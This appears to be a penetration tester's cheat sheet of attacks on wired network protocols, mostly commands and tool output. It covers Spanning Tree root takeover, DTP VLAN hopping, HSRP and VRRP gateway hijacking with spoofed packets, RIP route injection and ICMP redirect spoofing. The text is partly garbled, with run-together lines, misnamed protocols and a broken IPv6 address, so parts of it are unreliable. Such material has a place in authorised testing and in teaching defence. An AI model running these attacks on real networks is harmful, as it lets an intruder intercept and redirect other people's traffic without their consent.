Vlans & Wired networking
Spanning Tree Protocol (SPT) & Bridge Protocol Data Unit (BPDU):
Yersiniaresult:
┌── yersinia 0.7.3 by Slay & tomac - STP mode ─────────────────────[10:29:40]┐
│ RootId BridgeId Port Iface Last seen │
│ 5080.760F0E13AC58 CB09.E7CD90117CAA 8002 eth1 26 Aug 10:29:39 │
│ 5080.760F0E14AC58 CB09.E7CD90127CAA 8002 eth2 26 Aug 10:29:38 │bridge adapters (requires two) into each switch:
# bridge adapters
ettercap -T -i eth1 -B eth2 -q
# Run Yersinia
Yersinia
I
# Select Spanning Tree Protocol
g
# select root role :)
x
4Dynamic Trunking Protocol (DTP)
git clone https://github.com/commonexploits/dtpscan.git
cd dtpscan/
chmod a+x dtpscan.sh
./dtpscan.shresult:
[-] Now Sniffing DTP packets on interface eth1 for 90 seconds.
[+] DTP was found enabled in it's default state of 'Auto'.
[+] VLAN hopping will be possible.Run Yersinia:
yersinia –I
# select adapter
g
# select DTP
l
# see data from available VLANs using the 802.1Q menu
g
# this will reveal the vlan i.e.:
┌── yersinia 0.7.3 by Slay & tomac - 802.1Q mode ────────────────[15:00:08]┐
│ VLAN L2Prot Src IP Dst IP IP Prot Iface Last seen │
│ 0250 ARP 10.121.5.1 10.121.5.17? UKN eth1 11 Aug 14:51:00 │
│ 0250 ARP 10.121.5.235 10.121.5.1? UKN eth1 11 Aug 14:52:13 │
│ 0250 ARP 10.121.5.87 10.121.5.1? UKN eth1 11 Aug 14:52:20 │Using this, attacking VLAN 250:
modprobe 8021q
# add vlan
vconfig add eth1 250
# reset DHCP
dhclient eth1.250
#check
ifconfig eth1.250
# scan
arp-scan -I eth1.250 10.121.5.0/24HSRP & VRRP
Hot Standby Routing Protocol (HSRP)
scapy
>>> ip = IP(src='10.0.0.100', dst='224.0.0.2')
>>> udp = UDP()
>>> hsrp = HSRP(group=1, priority=255, virtualIP='10.0.0.1')
>>> send(ip/udp/hsrp, iface='eth1', inter=3, loop=1)Result:
┌── yersinia 0.7.3 by Slay & tomac - HSRP mode ───────────────────[18:29:40]┐
│ SIP DIP Auth VIP Iface Last seen │
│ 10.0.0.2 224.0.0.2 abc123 10.0.0.1 eth1 26 Aug 18:28:09 │
│ 10.0.0.3 224.0.0.2 abc123 10.0.0.1 eth1 26 Aug 18:26:06 │To include an authentication string within the HSRP packets, use hsrp:
while (true); do (hsrp -i eth1 -d 224.0.0.2 -v 10.0.0.1 -a abc123 -g 1 –S 10.0.0.100; sleep 3); doneVirtual Routing Resolution Protocol (VRRP)
tcpdump
13:34:02 0:0:5e:0:1:1 1:0:5e:0:0:12 ip 60 10.0.0.7 > 224.0.0.18 VRRPv2-advertisement
20: vrid=1 prio=100 authtype=simple intv1=1 addrs: 10.0.0.8 auth "abc123" [tos 0xc0]
(ttl 244, id 0, len 40)
0x0000 45c0 0028 0000 0000 ff70 19e4 c0a8 0007 E..(.....p......
0x0010 e000 0012 2101 6401 0101 dd1f c0a8 0007 ....!.d.........
0x0020 6162 6331 3233 0000 0000 0000 0000 0000 abc123..........You can then use Scapy to craft VRRP packets:
scapy
Welcome to Scapy (2.2.0)
>>> ip = IP(src='10.0.0.100', dst='224.0.0.18')
>>> udp = UDP()>>> vrrp = VRRP(vrid=1, priority=255, addrlist=["10.0.0.7", "10.0.0.8"], ipcount=2, \auth1='abc123')
>>> send(ip/udp/vrrp, iface='eth1', inter=3, loop=1)Routing Information Protocol (RIP)
3 version -
RIPv1
nemesis rip –c 2 –V 1 –a 1 –i 10.2.0.10 –m 1 –V 1 –S 10.0.0.100 –D 10.0.0.5RIPv2
nemesis rip –c 2 –V 2 –a 1 –i 10.2.0.10 –k 0xffffffff –m 1 –V 1 –S 10.0.0.100 -D 10.0.0.5RIPng (IPv6)
scapy
load_contrib("ripng")
ip = IPv6(src="2001
cafe:babe::1", dst="ff02::9")
udp = UDP()
ripng = RIPngEntry(prefix="2001:1234:dead:beef::/64", nexthop="2001:1234:cafe:babe::1")
send (ip/udp/ripng, iface='eth0', inter=3, loop=1)Enhance Interior Gateway Routing Protocol (EIGTRP)
TBC
Open Shortest Path First (OSPF)
TBC
Internet Control Message Protocol (ICMP) redirect spoofing
cd /usr/share/responder/
chmod a+x Icmp-Redirect.py
./Icmp-Redirect.py –I eth0 –i 10.0.0.100 –g 10.0.0.1 –t 10.0.0.5 –r 10.2.0.10Last updated